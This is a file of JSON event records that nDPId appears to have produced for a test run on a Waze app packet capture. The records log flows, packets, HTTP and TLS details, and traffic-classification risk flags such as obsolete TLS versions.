-00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868632,"flow_last_seen":1435587868910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1435587868910,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/images\/HD\/CH2.png","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868996,"flow_last_seen":1435587868996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587868996,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1435587868996,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587868996,"pkt":"ABoRAAACABoRAAABCABFAAA8cVdAAEAGm2kKCAABrcJ2MI7pAburox1\/AAAAAKAC\/\/9UDAAAAgQFtAQCCAoACGwoAAAAAAEDAwg="} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1435587868998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868998,"pkt":"ABoRAAACABoRAAABCABFAAAodHhAABAGyFytwnYwCggAAQG7julUXOKAq6MdgFAS\/\/\/xMQAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1435587869002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587869002,"pkt":"ABoRAAACABoRAAABCABFAAAocVhAAEAGm3wKCAABrcJ2MI7pAburox2AVFzigVAQ\/\/\/xMgAA"} -00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868634,"flow_last_seen":1435587869002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587869002,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868996,"flow_last_seen":1435587869054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1435587869054,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868635,"flow_last_seen":1435587869106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587869106,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868996,"flow_last_seen":1435587869107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1435587869107,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"23f1f6e2f0015c166df49fdab4280370","unsafe_cipher":2,"cipher":"TLS_ECDHE_RSA_WITH_RC4_128_SHA"}} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587869162,"flow_last_seen":1435587869162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587869162,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1435587869162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587869162,"pkt":"ABoRAAACABoRAAABCABFAAA8XmhAAEAGt7gKCAABNubjrLHgAFDjpDJQAAAAAKAC\/\/\/u\/QAAAgQFtAQCCAoACGw4AAAAAAEDAwg="} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1435587869163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587869163,"pkt":"ABoRAAACABoRAAABCABFAAAodIRAABAG0bA25uOsCggAAQBQseAcW82v46QyUVAS\/\/\/ZBQAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1435587869163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587869163,"pkt":"ABoRAAACABoRAAABCABFAAAoXmlAAEAGt8sKCAABNubjrLHgAFDjpDJRHFvNsFAQ\/\/\/ZBgAA"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587869162,"flow_last_seen":1435587869165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1435587869165,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_asr\/lang.portuguese_br_asr","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587869162,"flow_last_seen":1435587869166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1435587869166,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_asr\/lang.portuguese_br_asr","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -01094{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":66,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868635,"flow_last_seen":1435587869425,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587869425,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} -01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868634,"flow_last_seen":1435587869476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1435587869476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587868635,"flow_last_seen":1435587869477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1435587869477,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587867755,"flow_last_seen":1435587871459,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1631,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1435587871459,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"xtra1.gpsonextra.net","url":"xtra1.gpsonextra.net\/xtra2.bin","code":200,"content_type":"application\/octet-stream","user_agent":"Android"}} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871656,"flow_last_seen":1435587871656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871656,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1435587871656,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871656,"pkt":"ABoRAAACABoRAAABCABFAAA8\/jRAAEAGF+wKCAABNubjrLHiAFBcJZMGAAAAAKAC\/\/8UywAAAgQFtAQCCAoACG0yAAAAAAEDAwg="} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1435587871657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871657,"pkt":"ABoRAAACABoRAAABCABFAAAodJ1AABAG0Zc25uOsCggAAQBQseKj2mz5XCWTB1AS\/\/\/ZAwAA"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1435587871657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871657,"pkt":"ABoRAAACABoRAAABCABFAAAo\/jVAAEAGF\/8KCAABNubjrLHiAFBcJZMHo9ps+lAQ\/\/\/ZBAAA"} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871658,"flow_last_seen":1435587871658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871658,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1435587871658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871658,"pkt":"ABoRAAACABoRAAABCABFAAA8NxhAAEAG3wgKCAABNubjrLHkAFDBi1oqAAAAAKAC\/\/\/oPgAAAgQFtAQCCAoACG0yAAAAAAEDAwg="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1435587871659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871659,"pkt":"ABoRAAACABoRAAABCABFAAAodJ5AABAG0ZY25uOsCggAAQBQseQ+dKXVwYtaK1AS\/\/\/ZAQAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1435587871660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871660,"pkt":"ABoRAAACABoRAAABCABFAAAoNxlAAEAG3xsKCAABNubjrLHkAFDBi1orPnSl1lAQ\/\/\/ZAgAA"} -00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871656,"flow_last_seen":1435587871689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587871689,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_tts\/lang.portuguese_br_tts?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":108,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871656,"flow_last_seen":1435587871690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_tts\/lang.portuguese_br_tts?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871658,"flow_last_seen":1435587871690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/shields_conf_new_latam?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871658,"flow_last_seen":1435587871690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/shields_conf_new_latam?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871918,"flow_last_seen":1435587871918,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871918,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1435587871918,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871918,"pkt":"ABoRAAACABoRAAABCABFAAA8cIlAAEAGqJ4KCAABsCJnacdpAbv69x3BAAAAAKAC\/\/\/XPAAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1435587871929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871929,"pkt":"ABoRAAACABoRAAABCABFAAAodKhAABAG1JOwImdpCggAAQG7x2kFCOI++vcdwlAS\/\/\/FGAAA"} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871929,"flow_last_seen":1435587871929,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871929,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1435587871929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871929,"pkt":"ABoRAAACABoRAAABCABFAAA8KgBAAEAG7ycKCAABsCJnacdqAbskTkdIAAAAAKAC\/\/+EXgAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1435587871932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871932,"pkt":"ABoRAAACABoRAAABCABFAAAodKlAABAG1JKwImdpCggAAQG7x2rbsbi3JE5HSVAS\/\/\/FFwAA"} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":126,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871935,"flow_last_seen":1435587871935,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871935,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1435587871935,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871935,"pkt":"ABoRAAACABoRAAABCABFAAA8\/WxAAEAGG7sKCAABsCJnacdrAbsTBZAkAAAAAKAC\/\/9MygAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} 